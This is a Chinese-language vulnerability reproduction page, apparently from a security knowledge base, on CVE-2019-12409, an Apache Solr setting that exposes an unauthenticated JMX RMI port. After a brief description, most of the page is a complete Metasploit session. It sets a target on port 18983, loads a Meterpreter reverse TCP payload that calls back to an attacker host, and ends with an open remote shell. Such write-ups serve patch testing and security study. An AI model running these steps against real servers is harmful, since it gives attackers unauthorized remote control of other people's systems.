menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 016-Apache Solr chevron_right 005-CVE-2019-12409 Apache Solr 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    005-CVE-2019-12409 Apache Solr 远程命令执行漏洞.md
    4.12 KB / 2021-07-17 00:01:26
        ## CVE-2019-12409 Apache Solr 远程命令执行漏洞
    
    ### 一、漏洞简介
    
    Linux 下的环境下的Apache Solr 8.1.1和8.2.0版本
    
    存在默认不安全配置在solr.sh(ENABLE_REMOTE_JMX_OPTS="true"),将导致启用JMX监视服务并将公网监听一个18983的RMI端口,且无需进行任何身份验证。
    
    ### 二、漏洞影响
    
    Apache Solr 8.1.1和8.2.0版本
    
    ### 三、复现过程
    
    ```bash
    msf5 > use multi/misc/java_jmx_server
    msf5 exploit(multi/misc/java_jmx_server) > show options
    
    Module options (exploit/multi/misc/java_jmx_server):
    
       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
       JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
       JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
       RHOSTS                         yes       The target address range or CIDR identifier
       RPORT                          yes       The target port (TCP)
       SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT       8080             yes       The local port to listen on.
       SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                        no        The URI to use for this exploit (default is random)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Generic (Java Payload)
    
    
    msf5 exploit(multi/misc/java_jmx_server) > set RHOSTS a.a.a.a
    RHOSTS => a.a.a.a
    msf5 exploit(multi/misc/java_jmx_server) > set RPORT 18983
    RPORT => 18983
    msf5 exploit(multi/misc/java_jmx_server) > set payload java/meterpreter/reverse_tcp
    payload => java/meterpreter/reverse_tcp
    msf5 exploit(multi/misc/java_jmx_server) > show options
    
    Module options (exploit/multi/misc/java_jmx_server):
    
       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
       JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
       JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
       RHOSTS        a.a.a.a     yes       The target address range or CIDR identifier
       RPORT         18983            yes       The target port (TCP)
       SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT       8080             yes       The local port to listen on.
       SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                        no        The URI to use for this exploit (default is random)
    
    
    Payload options (java/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Generic (Java Payload)
    
    
    msf5 exploit(multi/misc/java_jmx_server) > set LHOST b.b.b.b
    LHOST => b.b.b.b
    msf5 exploit(multi/misc/java_jmx_server) > run
    [*] Started reverse TCP handler on b.b.b.b:4444
    [*] a.a.a.a:18983 - Using URL: http://b.b.b.b:8080/OcbYS8uaTPDH
    [*] a.a.a.a:18983 - Sending RMI Header...
    [*] a.a.a.a:18983 - Discovering the JMXRMI endpoint...
    [+] a.a.a.a:18983 - JMXRMI endpoint on a.a.a.a:18983
    [*] a.a.a.a:18983 - Proceeding with handshake...
    [+] a.a.a.a:18983 - Handshake with JMX MBean server on a.a.a.a:18983
    [*] a.a.a.a:18983 - Loading payload...
    [*] a.a.a.a:18983 - Replied to request for mlet
    [*] a.a.a.a:18983 - Replied to request for payload JAR
    [*] a.a.a.a:18983 - Executing payload...
    [*] a.a.a.a:18983 - Replied to request for payload JAR
    [*] Sending stage (53867 bytes) to a.a.a.a
    [*] Meterpreter session 1 opened (a.a.a.a:4444 -> b.b.b.b:46582) at 2019-11-21 15:24:53 +0000
    
    meterpreter >
    ```
    
    links
    file_download